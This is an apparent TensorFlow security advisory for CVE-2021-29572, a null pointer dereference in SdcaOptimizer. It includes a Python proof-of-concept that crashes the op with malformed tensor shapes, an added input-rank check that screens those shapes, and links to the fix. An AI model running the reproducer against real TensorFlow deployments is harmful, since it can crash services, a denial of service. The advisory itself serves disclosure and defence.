CVE-2021-29572: Reference binding to nullptr in `SdcaOptimizer`
The implementation of `tf.raw_ops.SdcaOptimizer` triggers undefined behavior due to dereferencing a null pointer:
```python
import tensorflow as tf

sparse_example_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)]
sparse_feature_indices = [tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), tf.constant((0), dtype=tf.int64)]
sparse_feature_values = []

dense_features = []
dense_weights = []

example_weights = tf.constant((0.0), dtype=tf.float32)
example_labels = tf.constant((0.0), dtype=tf.float32)

sparse_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)]
sparse_weights = [tf.constant((0.0), dtype=tf.float32), tf.constant((0.0), dtype=tf.float32)]

example_state_data = tf.constant([0.0, 0.0, 0.0, 0.0], shape=[1, 4], dtype=tf.float32)

tf.raw_ops.SdcaOptimizer(
    sparse_example_indices=sparse_example_indices,
    sparse_feature_indices=sparse_feature_indices,
    sparse_feature_values=sparse_feature_values, dense_features=dense_features,
    example_weights=example_weights, example_labels=example_labels,
    sparse_indices=sparse_indices, sparse_weights=sparse_weights,
    dense_weights=dense_weights, example_state_data=example_state_data,
    loss_type="logistic_loss", l1=0.0, l2=0.0, num_loss_partitions=1,
    num_inner_iterations=1, adaptative=False)
```
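
As an added example (not code from the advisory or from TensorFlow), the check below rejects the reproducer's arguments before they would reach the op by comparing each tensor's rank with the rank given in the op's API documentation; using those documented ranks is an assumption, since the page does not say which input causes the null dereference. `EXPECTED_RANKS`, `check_sdca_shapes` and `POC_SHAPES` are hypothetical names, and the shapes in `POC_SHAPES` are transcribed from the reproducer above.

```python
# Added example: rank pre-check for SdcaOptimizer arguments (not TensorFlow code).
# Assumption: expected ranks are taken from the op's API documentation.
# Maps argument name -> (is a list of tensors, expected rank of each tensor).
EXPECTED_RANKS = {
    "sparse_example_indices": (True, 1),
    "sparse_feature_indices": (True, 1),
    "sparse_feature_values": (True, 1),
    "dense_features": (True, 2),
    "example_weights": (False, 1),
    "example_labels": (False, 1),
    "sparse_indices": (True, 1),
    "sparse_weights": (True, 1),
    "dense_weights": (True, 1),
}  # example_state_data is not checked here


def check_sdca_shapes(shapes):
    """Return rank problems for {name: shape or [shapes]}; empty means OK."""
    problems = []
    for name, (is_list, rank) in EXPECTED_RANKS.items():
        if name not in shapes:
            problems.append(f"{name}: missing")
            continue
        items = shapes[name] if is_list else [shapes[name]]
        for i, shape in enumerate(items):
            if len(shape) != rank:
                label = f"{name}[{i}]" if is_list else name
                problems.append(f"{label}: rank {len(shape)}, expected {rank}")
    return problems


# Shapes transcribed from the reproducer on this page; tf.constant((0)) is a scalar.
POC_SHAPES = {
    "sparse_example_indices": [(), ()],
    "sparse_feature_indices": [(0, 0, 0, 0), ()],
    "sparse_feature_values": [],
    "dense_features": [],
    "example_weights": (),
    "example_labels": (),
    "sparse_indices": [(), ()],
    "sparse_weights": [(), ()],
    "dense_weights": [],
}

if __name__ == "__main__":
    for problem in check_sdca_shapes(POC_SHAPES):
        print("reject:", problem)
```

A check like this only screens inputs in front of an unpatched build; the fix itself is the commit listed in the references.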
References
- github.com/advisories/GHSA-5gqf-456p-4836
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-500.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-698.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-209.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/f7cc8755ac6683131fdfa7a8a121f9d7a9dec6fb
- github.com/tensorflow/tensorflow/security/advisories/GHSA-5gqf-456p-4836
- nvd.nist.gov/vuln/detail/CVE-2021-29572